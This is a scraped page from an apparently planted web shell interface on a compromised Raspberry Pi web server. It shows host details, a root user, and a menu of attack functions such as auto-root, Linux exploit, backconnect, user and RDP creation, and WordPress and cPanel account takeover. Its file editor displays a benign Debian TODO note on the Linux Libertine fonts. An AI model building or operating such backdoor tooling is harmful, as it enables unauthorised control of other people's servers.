Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.15
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
fonts-linuxlibertine /
[ HOME SHELL ]
Name
Size
Permission
Action
TODO.Debian
1.75
KB
-rw-r--r--
changelog.Debian.gz
2.97
KB
-rw-r--r--
changelog.gz
24.54
KB
-rw-r--r--
copyright
7.29
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TODO.Debian
# Next Steps for Linux Libertine in Debian In this document, whenever OpenType file is mentioned, we mean a file with PostScript/cubic Bézier splines. ## Suply of OpenType vs. TrueType fonts Do we really *need* to ship fonts as TrueType instead of OpenType? An OTF can be smaller than the equivalent TrueType font (fewer splines may be needed to represent the font) and may work better with engines that understand them. In an operating system like Debian, we probably don't need to be bound to legacy technologies after we have a stable version released that supports well the technology (and, in fact, fontconfig has worked well for quite some time). If we *do* need the TT version of the fonts, we should provide an upgrade path to the OT version. This, in particular, makes many things obsolete: * We don't have to deal with nasty patching of the fonts like done to address bug #523186 and be confused with the fonts having or not the "O" at the end of the name: the TT version won't have this suffix, while the OT version will, keeping closer in spirit what upstream does. * The "fixing" of bug #523186 leads to bugs like #578141. If we have real OT fonts with their intended names, we can drop aliases like debian/local/linux-libertine.conf does. * Providing two packages (called {otf,ttf}-linux-libertine) may be a good short-term solution. # Fidelity to upstream's desire Whenever we can (and, in most cases, we can, regarding fonts), we should be true to what upstream says and avoid rebuilding the fonts. From upstream's INSTALL.txt file: ,---- | If you have not a certain reason to compile the fonts yourself, we | recommend you to download the respective "LinLibertineFont" archive | from our website: linuxlibertine.sf.net `---- ---- Rogério Brito
Close